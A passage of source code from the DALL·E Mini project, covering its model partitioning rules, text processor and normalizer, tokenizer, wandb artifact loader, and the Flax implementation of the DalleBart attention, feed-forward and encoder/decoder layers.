[ # embeddings (("embed_positions", "embedding"), P("mp", None)), (("embed_tokens", "embedding"), P("mp", None)), (("rel_bias", "embedding"), P(None, "mp")), # attention (("(q_proj|k_proj|v_proj)", "kernel"), P(None, "mp")), (("out_proj", "kernel"), P("mp", None)), # FFN (("Dense_0", "kernel"), P(None, "mp")), (("GLU.*", "Dense_1", "kernel"), P(None, "mp")), (("GLU.*", "Dense_2", "kernel"), P("mp", None)), (("FFN.*", "Dense_1", "kernel"), P("mp", None)), # layer norms (("(bias|scale)",), None), (("lm_head", "kernel"), P(None, "mp")), # head scale and tau (("(head_scale|tau)",), None), ] def set_partitions(in_dict, use_scan): rules = _get_partition_rules() replace = _replacement_rules(rules) initd = {k: _unmatched for k in flatten_dict(in_dict)} result = {k: replace(k, v) for k, v in initd.items()} for k, v in result.items(): if v == _unmatched: print(f"Unmatched -> {k}") l = list(result.keys()) if use_scan: # add None dimension to layers result = { k: (P(*(None,) + v) if v is not None else None) if any(x in k for x in ["FlaxBartEncoderLayers", "FlaxBartDecoderLayers"]) else v for k, v in result.items() } assert _unmatched not in result.values(), "Incomplete partition spec." return freeze(unflatten_dict(result)) File: src/dalle_mini/model/__init__.py from .configuration import DalleBartConfig from .modeling import DalleBart from .partitions import set_partitions from .processor import DalleBartProcessor from .tokenizer import DalleBartTokenizer File: src/dalle_mini/model/processor.py """ DalleBart processor """ from typing import List import jax.numpy as jnp from .configuration import DalleBartConfig from .text import TextNormalizer from .tokenizer import DalleBartTokenizer from .utils import PretrainedFromWandbMixin class DalleBartProcessorBase: def __init__( self, tokenizer: DalleBartTokenizer, normalize_text: bool, max_text_length: int ): self.tokenizer = tokenizer self.normalize_text = normalize_text self.max_text_length = max_text_length if normalize_text: self.text_processor = TextNormalizer() # create unconditional tokens uncond = self.tokenizer( "", return_tensors="jax", padding="max_length", truncation=True, max_length=self.max_text_length, ).data self.input_ids_uncond = uncond["input_ids"] self.attention_mask_uncond = uncond["attention_mask"] def __call__(self, text: List[str] = None): # check that text is not a string assert not isinstance(text, str), "text must be a list of strings" if self.normalize_text: text = [self.text_processor(t) for t in text] res = self.tokenizer( text, return_tensors="jax", padding="max_length", truncation=True, max_length=self.max_text_length, ).data # tokens used only with super conditioning n = len(text) res["input_ids_uncond"] = jnp.repeat(self.input_ids_uncond, n, axis=0) res["attention_mask_uncond"] = jnp.repeat(self.attention_mask_uncond, n, axis=0) return res @classmethod def from_pretrained(cls, *args, **kwargs): tokenizer = DalleBartTokenizer.from_pretrained(*args, **kwargs) config = DalleBartConfig.from_pretrained(*args, **kwargs) return cls(tokenizer, config.normalize_text, config.max_text_length) class DalleBartProcessor(PretrainedFromWandbMixin, DalleBartProcessorBase): pass File: src/dalle_mini/model/tokenizer.py """ DalleBart tokenizer """ from transformers import BartTokenizerFast from .utils import PretrainedFromWandbMixin class DalleBartTokenizer(PretrainedFromWandbMixin, BartTokenizerFast): pass File: src/dalle_mini/model/utils.py import os import tempfile from pathlib import Path import wandb class PretrainedFromWandbMixin: @classmethod def from_pretrained(cls, pretrained_model_name_or_path, *model_args, **kwargs): """ Initializes from a wandb artifact or delegates loading to the superclass. """ with tempfile.TemporaryDirectory() as tmp_dir: # avoid multiple artifact copies if ":" in pretrained_model_name_or_path and not os.path.isdir( pretrained_model_name_or_path ): # wandb artifact if wandb.run is not None: artifact = wandb.run.use_artifact(pretrained_model_name_or_path) else: artifact = wandb.Api().artifact(pretrained_model_name_or_path) pretrained_model_name_or_path = artifact.download(tmp_dir) return super(PretrainedFromWandbMixin, cls).from_pretrained( pretrained_model_name_or_path, *model_args, **kwargs ) File: src/dalle_mini/model/text.py """ Utilities for processing text. """ import html import math import random import re from pathlib import Path import emoji import ftfy from huggingface_hub import hf_hub_download from unidecode import unidecode # based on wiki word occurrence person_token = [("a person", 282265), ("someone", 121194), ("somebody", 12219)] temp_token = "xtokx" # avoid repeating chars class HashtagProcessor: # Adapted from wordninja library # We use our wikipedia word count + a good heuristic to make it work def __init__(self): wiki_word_frequency = hf_hub_download( "dalle-mini/dalle-mini", filename="enwiki-words-frequency.txt" ) self._word_cost = ( l.split()[0] for l in Path(wiki_word_frequency).read_text(encoding="utf8").splitlines() ) self._word_cost = { str(k): math.log(float(i + 1)) for i, k in enumerate(self._word_cost) } self._max_word = max(len(x) for x in self._word_cost.keys()) self._SPLIT_RE = re.compile("[^a-zA-Z0-9']+") def __call__(self, s): """Uses dynamic programming to infer the location of spaces in a string without spaces.""" l = [self._split(x) for x in self._SPLIT_RE.split(s)] return " ".join([item for sublist in l for item in sublist]) def _split(self, s): # Find the best match for the i first characters, assuming cost has # been built for the i-1 first characters. # Returns a pair (match_cost, match_length). def best_match(i): candidates = enumerate(reversed(cost[max(0, i - self._max_word) : i])) return min( (c + self._word_cost.get(s[i - k - 1 : i].lower(), 9e999), k + 1) for k, c in candidates ) # Build the cost array cost = [0] for i in range(1, len(s) + 1): c, k = best_match(i) cost.append(c) # Backtrack to recover the minimal-cost string. out = [] i = len(s) while i > 0: c, k = best_match(i) assert c == cost[i] newToken = True if not s[i - k : i] == "'": # ignore a lone apostrophe if len(out) > 0: # re-attach split 's and split digits if out[-1] == "'s" or ( s[i - 1].isdigit() and out[-1][0].isdigit() ): # digit followed by digit out[-1] = ( s[i - k : i] + out[-1] ) # combine current token with previous token newToken = False if newToken: out.append(s[i - k : i]) i -= k return reversed(out) def replace_person_token(t): "Used for CC12M" t = re.sub("<person>([,\s]*(and)*[,\s]*<person>)+", " people ", t) while "<person>" in t: t = t.replace( "<person>", f" {random.choices(*tuple(zip(*person_token)))[0]} ", 1 ) return t def fix_html(t): # from OpenAI CLIP return html.unescape(html.unescape(t)) def replace_punctuation_with_commas(t): return re.sub("[()[\].,|:;?!=+~\-\/{}]", ",", t) def simplify_quotes(t): return re.sub("""['"`]""", ' " ', t) def merge_quotes(t): return re.sub('(\s*"+\s*)+', ' " ', t) def remove_comma_numbers(t): def _f(t): return re.sub("(\d),(\d{3})", r"\1\2", t) return _f(_f(t)) def pre_process_dot_numbers(t): return re.sub("(\w)\.(\w)", rf"\1{temp_token}dot{temp_token}\2", t) def post_process_dot_numbers(t): return re.sub(f"{temp_token}dot{temp_token}", ".", t) def pre_process_quotes(t): # allows quotes only for 's, 't, 'd, 'm, 'll, 're, 've return re.sub( r"'(?=([stdm]|(ll)|(re)|(ve)|(ll))\b)", rf"{temp_token}quote{temp_token}", t ) def post_process_quotes(t): return re.sub(f"{temp_token}quote{temp_token}", "'", t) def pre_process_dates(t): return re.sub("(\d)/(\d)", rf"\1{temp_token}slash{temp_token}\2", t) def post_process_dates(t): return re.sub(f"{temp_token}slash{temp_token}", "/", t) def merge_commas(t): return re.sub("(\s*,+\s*)+", ", ", t) def add_space_after_commas(t): return re.sub(",", ", ", t) def handle_special_chars(t): "Handle special characters" # replace "-" with a space when between words without space t = re.sub("(\w)-(\w)", r"\1 \2", t) # always add space around some characters return re.sub("([%&\/$*])", r" \1 ", t) def expand_hashtags(t, hashtag_processor): "Remove # and try to split words" return re.sub("#(\w+)", lambda m: hashtag_processor(m.group(1)), t) _re_ignore_chars = r"[_#\\]" def ignore_chars(t): "Ignore useless characters" return re.sub(_re_ignore_chars, " ", t) def remove_extra_spaces(t): "Remove extra spaces (including \t and \n)" return re.sub("\s+", " ", t) def remove_repeating_chars(t): "If the same character is present 4+ times (not 3 because of roman 'VIII'), replace with single instance" return re.sub(r"(\D)(\1{3,})", r"\1", t) def remove_urls(t): return re.sub(r"http\S+", "", t) def remove_html_tags(t): return re.sub("<[^<]+?>", " ", t) def remove_first_last_commas(t): t = t.strip() t = t[:-1] if t and t[-1] == "," else t t = t[1:] if t and t[0] == "," else t return t.strip() def remove_wiki_ref(t): t = re.sub(r"\A\s*\[\d+\]", "", t) return re.sub(r"\[\d+\]\s*\Z", "", t) class TextNormalizer: "Normalize text" def __init__(self): self._hashtag_processor = HashtagProcessor() def __call__(self, t): # fix some characters t = ftfy.fix_text(t) # fix html t = fix_html(t) # decode emojis (would be removed by unidecode) t = emoji.demojize(t) # decode and simplify text: see unidecode library t = unidecode(t) # lower case t = t.lower() # replace <PERSON> (for CC12M) t = replace_person_token(t) # remove wiki reference (for WIT) t = remove_wiki_ref(t) # remove html tags t = remove_html_tags(t) # remove urls t = remove_urls(t) # remove commas in numbers t = remove_comma_numbers(t) # handle dots in numbers and quotes - Part 1 t = pre_process_dot_numbers(t) t = pre_process_quotes(t) t = pre_process_dates(t) # handle special characters t = handle_special_chars(t) # handle hashtags t = expand_hashtags(t, self._hashtag_processor) # ignore useless characters t = ignore_chars(t) # simplify quotes t = simplify_quotes(t) # all punctuation becomes commas t = replace_punctuation_with_commas(t) # handle dots in numbers and quotes - Part 2 t = post_process_dot_numbers(t) t = post_process_quotes(t) t = post_process_dates(t) # handle repeating characters t = remove_repeating_chars(t) # merge quotes t = merge_quotes(t) # merge commas t = merge_commas(t) # remove multiple spaces t = remove_extra_spaces(t) # remove first and last comma t = remove_first_last_commas(t) # always start with a space return f" {t}" File: src/dalle_mini/model/modeling.py # coding=utf-8 # Copyright 2021-2022 The Fairseq Authors and The Google Flax Team Authors And The HuggingFace Inc. team and & DALL·E Mini team. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ DalleBart model. """ import math from functools import partial from typing import Any, Dict, Optional, Tuple import flax import flax.linen as nn import jax import jax.numpy as jnp from einops import rearrange from flax.core.frozen_dict import unfreeze from flax.linen import combine_masks, make_causal_mask from flax.linen import partitioning as nn_partitioning from flax.linen.linear import PrecisionLike from flax.traverse_util import flatten_dict, unflatten_dict from jax import custom_jvp, lax from jax.random import PRNGKey from transformers.modeling_flax_outputs import ( FlaxBaseModelOutput, FlaxBaseModelOutputWithPastAndCrossAttentions, FlaxCausalLMOutputWithCrossAttentions, FlaxSeq2SeqLMOutput, ) from transformers.modeling_flax_utils import ACT2FN from transformers.models.bart.modeling_flax_bart import ( FlaxBartAttention, FlaxBartForConditionalGeneration, FlaxBartForConditionalGenerationModule, FlaxBartModule, ) from transformers.utils import ModelOutput, logging from .configuration import DalleBartConfig from .utils import PretrainedFromWandbMixin logger = logging.get_logger(__name__) remat = nn_partitioning.remat def smelu(beta: Any = 1.0): """ Implementation of "Real World Large Scale Recommendation Systems Reproducibility and Smooth Activations" https://arxiv.org/abs/2202.06499 """ @custom_jvp @jax.jit def _smelu(x: Any) -> Any: x = jnp.where(x <= -beta, 0.0, x) return jnp.where(x >= beta, x, jnp.square(x + beta) / (4 * beta)) _smelu.defjvps( lambda g, ans, x: lax.select( x == -beta, lax.full_like(g, 0), lax.select(x == beta, lax.full_like(g, 1), g), ) ) return _smelu ACT2FN.update({"smelu": smelu()}) # deepnet initialization def deepnet_init(init_std, gain=1): init = jax.nn.initializers.normal(init_std) def _init(*args, **kwargs): return gain * init(*args, **kwargs) return _init # deepnet gain deepnet_gain = { "encoder": { "alpha": lambda config: 0.81 * (config.encoder_layers**4 * config.decoder_layers) ** 0.0625, "beta": lambda config: 0.87 * (config.encoder_layers**4 * config.decoder_layers) ** -0.0625, }, "decoder": { "alpha": lambda config: (3 * config.decoder_layers) ** 0.25, "beta": lambda config: (12 * config.decoder_layers) ** -0.25, }, } # subln gain subln_gain = { "encoder": lambda config: math.sqrt( 1.0 / 3.0 * math.log(3 * config.decoder_layers) * math.log(2 * config.encoder_layers) ), "decoder": lambda config: math.sqrt(math.log(3 * config.decoder_layers)), } class RMSNorm(nn.Module): """ From "Root Mean Square Layer Normalization" by https://arxiv.org/abs/1910.07467 Adapted from flax.linen.LayerNorm """ epsilon: float = 1e-6 dtype: Any = jnp.float32 param_dtype: Any = jnp.float32 use_scale: bool = True scale_init: Any = jax.nn.initializers.ones @nn.compact def __call__(self, x): reduction_axes = (-1,) feature_axes = (-1,) rms_sq = self._compute_rms_sq(x, reduction_axes) return self._normalize( self, x, rms_sq, reduction_axes, feature_axes, self.dtype, self.param_dtype, self.epsilon, self.use_scale, self.scale_init, ) def _compute_rms_sq(self, x, axes): x = jnp.asarray(x, jnp.promote_types(jnp.float32, jnp.result_type(x))) rms_sq = jnp.mean(jax.lax.square(x), axes) return rms_sq def _normalize( self, mdl, x, rms_sq, reduction_axes, feature_axes, dtype, param_dtype, epsilon, use_scale, scale_init, ): reduction_axes = nn.normalization._canonicalize_axes(x.ndim, reduction_axes) feature_axes = nn.normalization._canonicalize_axes(x.ndim, feature_axes) stats_shape = list(x.shape) for axis in reduction_axes: stats_shape[axis] = 1 rms_sq = rms_sq.reshape(stats_shape) feature_shape = [1] * x.ndim reduced_feature_shape = [] for ax in feature_axes: feature_shape[ax] = x.shape[ax] reduced_feature_shape.append(x.shape[ax]) mul = lax.rsqrt(rms_sq + epsilon) if use_scale: scale = mdl.param( "scale", scale_init, reduced_feature_shape, param_dtype ).reshape(feature_shape) mul *= scale y = mul * x return jnp.asarray(y, dtype) def norm(type, *args, **kwargs): if type == "rmsnorm": return RMSNorm(*args, **kwargs) elif type == "layernorm": return nn.LayerNorm(*args, **kwargs) else: raise ValueError(f"Unknown norm type {type}") def dot_product_attention_weights( query: Any, key: Any, bias: Optional[Any] = None, mask: Optional[Any] = None, embed_pos: Optional[Any] = None, broadcast_dropout: bool = True, dropout_rng: Optional[PRNGKey] = None, dropout_rate: float = 0.0, deterministic: bool = False, dtype: Any = jnp.float32, precision: PrecisionLike = None, sinkhorn_iters: int = 1, is_encoder: bool = False, tau=None, ): """ Computes dot-product attention weights given query and key. mask is included into the bias. Adapted from flax.linen.attention.dot_product_attention_weights" """ assert query.ndim == key.ndim, "q, k must have same rank." assert query.shape[:-3] == key.shape[:-3], "q, k batch dims must match." assert query.shape[-2] == key.shape[-2], "q, k num_heads must match." assert query.shape[-1] == key.shape[-1], "q, k depths must match." # attn weight shape is (batch..., num_heads, q_length, kv_length) attn_weights = jnp.einsum("...qhd,...khd->...hqk", query, key, precision=precision) # divide by tau (used in Swin v2) if tau is not None: attn_weights = attn_weights / tau else: depth = query.shape[-1] attn_weights = attn_weights / jnp.sqrt(depth).astype(dtype) # apply attention bias: masking, dropout, proximity bias, etc. if bias is not None: attn_weights = attn_weights + bias # add relative position if embed_pos is not None: attn_weights = attn_weights + embed_pos # normalize the attention weights if not is_encoder or sinkhorn_iters == 1: # sinkhorn does not work for causal (leaks info of future tokens into past) attn_weights = jax.nn.softmax(attn_weights).astype(dtype) else: # adapted from https://github.com/lucidrains/sinkhorn-transformer for i in range(sinkhorn_iters): # when causal, some attn_weights have been set to -inf through bias if i % 2 == 0: attn_weights -= jax.nn.logsumexp(attn_weights, axis=-1, keepdims=True) else: attn_weights -= jax.nn.logsumexp(attn_weights, axis=-2, keepdims=True) if mask is not None: attn_weights = jnp.where(mask, attn_weights, -jnp.inf) attn_weights = jnp.exp(attn_weights).astype(dtype) # apply attention dropout if not deterministic and dropout_rate > 0.0: keep_prob = 1.0 - dropout_rate if broadcast_dropout: # dropout is broadcast across the batch + head dimensions dropout_shape = tuple([1] * (key.ndim - 2)) + attn_weights.shape[-2:] keep = jax.random.bernoulli(dropout_rng, keep_prob, dropout_shape) else: keep = jax.random.bernoulli(dropout_rng, keep_prob, attn_weights.shape) multiplier = keep.astype(attn_weights.dtype) / jnp.asarray( keep_prob, dtype=dtype ) attn_weights = attn_weights * multiplier return attn_weights class FlaxBartAttention(FlaxBartAttention): """ Edits: - causal mask is used only in decoder and considers image_length - scale attention heads per NormFormer paper """ is_encoder: bool = False is_cross_attention: bool = False q_length: int = None k_length: int = None def setup(self) -> None: self.head_dim = self.embed_dim // self.num_heads if self.head_dim * self.num_heads != self.embed_dim: raise ValueError( f"embed_dim must be divisible by num_heads (got `embed_dim`: {self.embed_dim}" f" and `num_heads`: {self.num_heads})." ) dense = partial( nn.Dense, self.embed_dim, use_bias=self.bias, dtype=self.dtype, ) if self.config.use_deepnet_scaling: gain = deepnet_gain["encoder" if self.is_encoder else "decoder"]["beta"]( self.config ) elif self.config.use_subln_init and not self.is_cross_attention: gain = subln_gain["encoder" if self.is_encoder else "decoder"](self.config) self.q_proj = dense( kernel_init=jax.nn.initializers.normal(self.config.init_std) ) self.k_proj = dense( kernel_init=jax.nn.initializers.normal(self.config.init_std) ) self.v_proj = dense( kernel_init=deepnet_init(self.config.init_std, gain) if ( self.config.use_deepnet_scaling or (self.config.use_subln_init and not self.is_cross_attention) ) else jax.nn.initializers.normal(self.config.init_std) ) self.out_proj = dense( kernel_init=deepnet_init(self.config.init_std, gain) if ( self.config.use_deepnet_scaling or (self.config.use_subln_init and not self.is_cross_attention) ) else jax.nn.initializers.normal(self.config.init_std) ) self.dropout_layer = nn.Dropout(rate=self.dropout) if self.config.use_head_scale: self.head_scale = self.param( "head_scale", jax.nn.initializers.ones, (1, 1, self.num_heads, 1) ) if self.config.use_cosine_attention: # TODO: try using a learnt scale, somehow it immediately diverges in my experiments self.tau = self.config.tau_init if self.config.use_swin_position_embeddings: self.rel_bias = nn.Embed( self.q_length, self.k_length * self.num_heads, embedding_init=jax.nn.initializers.normal(self.config.init_std), ) if self.causal: # used only in decoder self.causal_mask = make_causal_mask( jnp.ones((1, self.config.image_length), dtype="bool"), dtype="bool" ) if self.config.ln_positions in ["subln"] and not self.is_cross_attention: self.mid_layernorm = norm( self.config.ln_type, dtype=self.dtype, epsilon=1e-05 ) def __call__( self, hidden_states: jnp.ndarray, key_value_states: Optional[jnp.ndarray] = None, attention_mask: Optional[jnp.ndarray] = None, init_cache: bool = False, deterministic: bool = True, ) -> Tuple[jnp.ndarray]: """Input shape: Batch x Time x Channel""" # if key_value_states are provided this layer is used as a cross-attention layer # for the decoder is_cross_attention = key_value_states is not None batch_size = hidden_states.shape[0] # get query proj query_states = self.q_proj(hidden_states) # get key, value proj if is_cross_attention: # cross_attentions key_states = self.k_proj(key_value_states) value_states = self.v_proj(key_value_states) else: # self_attention key_states = self.k_proj(hidden_states) value_states = self.v_proj(hidden_states) query_states = self._split_heads(query_states) key_states = self._split_heads(key_states) value_states = self._split_heads(value_states) # handle cache prepare causal attention mask if self.causal: query_length, key_length = query_states.shape[1], key_states.shape[1] if self.has_variable("cache", "cached_key"): mask_shift = self.variables["cache"]["cache_index"] max_decoder_length = self.variables["cache"]["cached_key"].shape[1] causal_mask = lax.dynamic_slice( self.causal_mask, (0, 0, mask_shift, 0), (1, 1, query_length, max_decoder_length), ) else: causal_mask = self.causal_mask[:, :, :query_length, :key_length] causal_mask = jnp.broadcast_to( causal_mask, (batch_size,) + causal_mask.shape[1:] ) # combine masks if needed if attention_mask is not None and self.causal: attention_mask = jnp.broadcast_to( jnp.expand_dims(attention_mask, axis=(-3, -2)), causal_mask.shape ) attention_mask = combine_masks(attention_mask, causal_mask) elif self.causal: attention_mask = causal_mask elif attention_mask is not None: attention_mask = jnp.expand_dims(attention_mask, axis=(-3, -2)) # During fast autoregressive decoding, we feed one position at a time, # and cache the keys and values step by step. if self.causal and (self.has_variable("cache", "cached_key") or init_cache): key_states, value_states, attention_mask = self._concatenate_to_cache( key_states, value_states, query_states, attention_mask ) # Convert the boolean attention mask to an attention bias. if attention_mask is not None: # attention mask in the form of attention bias attention_bias = lax.select( attention_mask > 0, jnp.full(attention_mask.shape, 0.0).astype(self.dtype), jnp.full(attention_mask.shape, -jnp.inf).astype(self.dtype), ) else: attention_bias = None dropout_rng = None if not deterministic and self.dropout > 0.0: dropout_rng = self.make_rng("dropout") if self.config.use_cosine_attention: # normalize q and k query_states = query_states / ( jnp.linalg.norm(query_states, axis=-1, keepdims=True) + 1e-8 ) key_states = key_states / ( jnp.linalg.norm(key_states, axis=-1, keepdims=True) + 1e-8 ) # relative position embeddings if self.config.use_swin_position_embeddings: position_ids = jnp.arange(self.q_length) embed_pos = self.rel_bias(position_ids) embed_pos = rearrange(embed_pos, "q (k h) -> 1 h q k", h=self.num_heads) else: embed_pos = None tau = self.tau if self.config.use_cosine_attention else None attn_weights = dot_product_attention_weights( query_states, key_states, bias=attention_bias, mask=attention_mask, embed_pos=embed_pos, dropout_rng=dropout_rng, dropout_rate=self.dropout, broadcast_dropout=True, deterministic=deterministic, dtype=self.dtype, precision=None, sinkhorn_iters=self.config.sinkhorn_iters, is_encoder=self.is_encoder, tau=tau, ) attn_output = jnp.einsum("...hqk,...khd->...qhd", attn_weights, value_states) if self.config.use_head_scale: # per Normformer attn_output = attn_output * self.head_scale attn_output = self._merge_heads(attn_output) if self.config.ln_positions in ["subln"] and not self.is_cross_attention: attn_output = self.mid_layernorm(attn_output) attn_output = self.out_proj(attn_output) return attn_output, attn_weights class GLU(nn.Module): """From "GLU Variants Improve Transformer" by https://arxiv.org/abs/2002.05202""" config: DalleBartConfig ffn_dim: int embed_dim: int dtype: jnp.dtype = jnp.float32 is_encoder: bool = False @nn.compact def __call__(self, x: jnp.ndarray, deterministic: bool = True) -> jnp.ndarray: if self.config.use_deepnet_scaling: gain = deepnet_gain["encoder" if self.is_encoder else "decoder"]["beta"]( self.config ) elif self.config.use_subln_init: gain = subln_gain["encoder" if self.is_encoder else "decoder"](self.config) if self.config.ln_positions in ["normformer", "cogview", "preln", "subln"]: x = norm( self.config.ln_type, dtype=self.dtype, epsilon=1e-05, use_scale=self.config.force_ln_scale, )(x) w = nn.Dense( self.ffn_dim, dtype=self.dtype, use_bias=self.config.use_bias, kernel_init=deepnet_init(self.config.init_std, gain) if (self.config.use_deepnet_scaling or self.config.use_subln_init) else jax.nn.initializers.normal(self.config.init_std), )(x) w = ACT2FN[self.config.activation_function](w) v = nn.Dense( self.ffn_dim, dtype=self.dtype, use_bias=self.config.use_bias, kernel_init=deepnet_init(self.config.init_std, gain) if (self.config.use_deepnet_scaling or self.config.use_subln_init) else jax.nn.initializers.normal(self.config.init_std), )(x) x = w * v if self.config.ln_positions in ["normformer", "subln"]: x = norm( self.config.ln_type, dtype=self.dtype, epsilon=1e-05, use_scale=self.config.force_ln_scale, )(x) x = nn.Dropout(rate=self.config.activation_dropout)( x, deterministic=deterministic ) x = nn.Dense( self.embed_dim, dtype=self.dtype, use_bias=self.config.use_bias, kernel_init=deepnet_init(self.config.init_std, gain) if (self.config.use_deepnet_scaling or self.config.use_subln_init) else jax.nn.initializers.normal(self.config.init_std), )(x) if self.config.ln_positions in ["swinv2", "cogview"]: x = norm(self.config.ln_type, dtype=self.dtype, epsilon=1e-05)(x) x = nn.Dropout(rate=self.config.dropout)(x, deterministic=deterministic) return x class FFN(nn.Module): """Simple FFN layer""" config: DalleBartConfig ffn_dim: int embed_dim: int dtype: jnp.dtype = jnp.float32 is_encoder: bool = False @nn.compact def __call__(self, x: jnp.ndarray, deterministic: bool = True) -> jnp.ndarray: if self.config.use_deepnet_scaling: gain = deepnet_gain["encoder" if self.is_encoder else "decoder"]["beta"]( self.config ) elif self.config.use_subln_init: gain = subln_gain["encoder" if self.is_encoder else "decoder"](self.config) if self.config.ln_positions in ["normformer", "cogview", "preln", "subln"]: x = norm( self.config.ln_type, dtype=self.dtype, epsilon=1e-05, use_scale=self.config.force_ln_scale, )(x) x = nn.Dense( self.ffn_dim, dtype=self.dtype, use_bias=self.config.use_bias, kernel_init=deepnet_init(self.config.init_std, gain) if (self.config.use_deepnet_scaling or self.config.use_subln_init) else jax.nn.initializers.normal(self.config.init_std), )(x) x = ACT2FN[self.config.activation_function](x) if self.config.ln_positions in ["normformer", "subln"]: x = norm( self.config.ln_type, dtype=self.dtype, epsilon=1e-05, use_scale=self.config.force_ln_scale, )(x) x = nn.Dropout(rate=self.config.activation_dropout)( x, deterministic=deterministic ) x = nn.Dense( self.embed_dim, dtype=self.dtype, use_bias=self.config.use_bias, kernel_init=deepnet_init(self.config.init_std, gain) if (self.config.use_deepnet_scaling or self.config.use_subln_init) else jax.nn.initializers.normal(self.config.init_std), )(x) if self.config.ln_positions in ["swinv2", "cogview"]: x = norm(self.config.ln_type, dtype=self.dtype, epsilon=1e-05)(x) x = nn.Dropout(rate=self.config.dropout)(x, deterministic=deterministic) return x class FlaxBartEncoderLayer(nn.Module): """ Edits: - no bias - use custom FlaxBartAttention """ config: DalleBartConfig dtype: jnp.dtype = jnp.float32 add_norm: bool = False use_scale: bool = True @nn.compact def __call__( self, hidden_states: jnp.ndarray, attention_mask: jnp.ndarray, output_attentions: bool = True, deterministic: bool = True, ) -> Tuple[jnp.ndarray]: if self.config.use_scan: hidden_states = hidden_states[0] res_gain = ( deepnet_gain["encoder"]["alpha"](self.config) if self.config.use_deepnet_scaling else 1 ) embed_dim = self.config.d_model residual = hidden_states if self.config.ln_positions in ["normformer", "cogview", "preln", "subln"]: hidden_states = norm( self.config.ln_type, dtype=self.dtype, epsilon=1e-05, use_scale=self.config.force_ln_scale, )(hidden_states) hidden_states, attn_weights = FlaxBartAttention( config=self.config, embed_dim=embed_dim, num_heads=self.config.encoder_attention_heads, dropout=self.config.attention_dropout, bias=self.config.use_bias, dtype=self.dtype, is_encoder=True, is_cross_attention=False, q_length=self.config.max_text_length, k_length=self.config.max_text_length, )(hidden_states=hidden_states, attention_mask=attention_mask) if self.config.ln_positions in ["normformer", "swinv2", "cogview"]: hidden_states = norm(self.config.ln_type, dtype=self.dtype, epsilon=1e-05)( hidden_states ) hidden_states = nn.Dropout(rate=self.config.dropout)( hidden_states, deterministic=deterministic ) hidden_states = residual * res_gain + hidden_states if self.config.ln_positions in ["postln"]: hidden_states = norm(self.config.ln_type, dtype=self.dtype, epsilon=1e-05)( hidden_states ) residual = hidden_states ff_block = ( GLU( config=self.config, ffn_dim=self.config.encoder_ffn_dim, embed_dim=embed_dim, dtype=self.dtype, is_encoder=True, ) if self.config.use_glu else FFN( config=self.config, ffn_dim=self.config.encoder_ffn_dim, embed_dim=embed_dim, dtype=self.dtype, is_encoder=True, ) ) hidden_states = ff_block(hidden_states, deterministic=deterministic) hidden_states = residual * res_gain + hidden_states if self.add_norm: use_scale = self.use_scale or self.config.force_ln_scale hidden_states = norm( self.config.ln_type, dtype=self.dtype, epsilon=1e-05, use_scale=use_scale, )(hidden_states) outputs = (hidden_states,) if output_attentions: outputs += (attn_weights,) if self.config.use_scan: outputs = (outputs, None) return outputs class FlaxBartDecoderLayer(nn.Module): """ Edits: - no bias - use custom FlaxBartAttention """ config: DalleBartConfig dtype: jnp.dtype = jnp.float32 add_norm: bool = False use_scale: bool = True @nn.compact def __call__( self, hidden_states: jnp.ndarray, attention_mask: jnp.ndarray, encoder_hidden_states: Optional[jnp.ndarray] = None, encoder_attention_mask: Optional[jnp.ndarray] = None, init_cache: bool = False, output_attentions: bool = True, deterministic: bool = True, ) -> Tuple[jnp.ndarray]: if self.config.use_scan: hidden_states = hidden_states[0] res_gain = ( deepnet_gain["decoder"]["alpha"](self.config) if self.config.use_deepnet_scaling else 1 ) embed_dim = self.config.d_model residual = hidden_states # Self Attention if self.config.ln_positions in ["normformer", "cogview", "preln"]: hidden_states = norm( self.config.ln_type, dtype=self.dtype, epsilon=1e-05, use_scale=self.config.force_ln_scale, )(hidden_states) hidden_states, attn_weights = FlaxBartAttention( config=self.config, embed_dim=embed_dim, num_heads=self.config.decoder_attention_heads, dropout=self.config.attention_dropout, causal=True, bias=self.config.use_bias, dtype=self.dtype, is_encoder=False, is_cross_attention=False, q_length=self.config.image_length, k_length=self.config.image_length, )( hidden_states=hidden_states, attention_mask=attention_mask, init_cache=init_cache, ) if self.config.ln_positions in ["normformer", "swinv2", "cogview"]: hidden_states = norm(self.config.ln_type, dtype=self.dtype, epsilon=1e-05)( hidden_states ) hidden_states = nn.Dropout(rate=self.config.dropout)( hidden_states, deterministic=deterministic ) hidden_states = residual * res_gain + hidden_states if self.config.ln_positions in ["postln"]: hidden_states = norm(self.config.ln_type, dtype=self.dtype, epsilon=1e-05)( hidden_states ) # Cross Attention cross_attn_weights = None if encoder_hidden_states is not None: residual = hidden_states if self.config.ln_positions in ["normformer", "cogview", "preln"]: hidden_states = norm( self.config.ln_type, dtype=self.dtype, epsilon=1e-05, use_scale=self.config.force_ln_scale, )(hidden_states) hidden_states, cross_attn_weights = FlaxBartAttention( config=self.config, embed_dim=embed_dim, num_heads=self.config.decoder_attention_heads, dropout=self.config.attention_dropout, bias=self.config.use_bias, dtype=self.dtype, is_encoder=False, is_cross_attention=True, q_length=self.config.image_length, k_length=self.config.max_text_length, )( hidden_states=hidden_states, key_value_states=encoder_hidden_states, attention_mask=encoder_attention_mask, ) if self.config.ln_positions in ["normformer", "swinv2", "cogview"]: hidden_states = norm( self.config.ln_type, dtype=self.dtype, epsilon=1e-05 )(hidden_states) hidden_states = nn.Dropout(rate=self.config.dropout)( hidden_states, deterministic=deterministic ) hidden_states = residual * res_gain + hidden_states if self.config.ln_positions in ["postln"]: hidden_states = norm( self.config.ln_type, dtype=self.dtype, epsilon=1e-05 )(hidden_states) # Feed forward residual = hidden_states ff_block = ( GLU( config=self.config, ffn_dim=self.config.decoder_ffn_dim, embed_dim=embed_dim, dtype=self.dtype, is_encoder=False, ) if self.config.use_glu else FFN( config=self.config, ffn_dim=self.config.decoder_ffn_dim, embed_dim=embed_dim, dtype=self.dtype, is_encoder=False, ) ) hidden_states = ff_block(hidden_states, deterministic=deterministic) hidden_states = residual * res_gain + hidden_states if self.add_norm: use_scale = self.use_scale or self.config.force_ln_scale hidden_states = norm( self.config.ln_type, dtype=self.dtype, epsilon=1e-05, use_scale=use_scale, )(hidden_states) outputs = (hidden_states,) if output_attentions: outputs += (attn_weights, cross_attn_weights) if self.config.use_scan: outputs = (outputs, None) 